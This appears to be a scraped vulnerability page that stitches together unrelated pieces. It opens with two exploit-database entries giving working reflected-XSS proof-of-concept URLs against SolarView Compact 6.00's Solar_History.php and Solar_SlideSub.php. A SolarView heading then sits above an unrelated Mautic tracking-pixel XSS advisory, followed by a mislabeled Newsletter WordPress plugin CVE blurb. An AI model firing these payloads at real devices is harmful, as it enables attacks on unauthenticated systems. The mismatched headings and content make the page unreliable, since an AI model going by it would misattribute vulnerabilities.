    # Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)# Date: 2022-05-15# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: ver.6.00# Vendor home page : https://www.contec.com/# Authentication Required: No# CVE : CVE-2022-29299# Tested on: Windows# Proof Of Concept:http://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)# Date: 2022-05-15# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: ver.6.00# Vendor home page : https://www.contec.com/# Authentication Required: No# CVE : CVE-2022-29301# Tested on: Windows# Proof Of Concept:http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green

SolarView Compact 6.00 Cross Site Scripting

A cross-site scripting (XSS) vulnerability in the web tracking component of Mautic before 4.3.0 allows remote attackers to inject executable javascript

**Impact**

Mautic allows you to track open rates by using tracking pixels.  
The tracking information is stored together with extra metadata of the tracking request.

The output isn't sufficiently filtered when showing the metadata of the tracking information, which may lead to a vulnerable situation.

**Patches**

Please upgrade to 4.3.0

**Workarounds**

None.

**References**

*   Internally tracked under MST-38

**For more information**

If you have any questions or comments about this advisory:

*   Email us at security@mautic.org

CVE-2022-25772

The Newsletter WordPress plugin before 7.4.6 does not escape and sanitise the preheader_text setting, which could allow high privilege users to perform Stored Cross-Site Scripting attacks when the unfilteredhtml is disallowed

Tag

#xss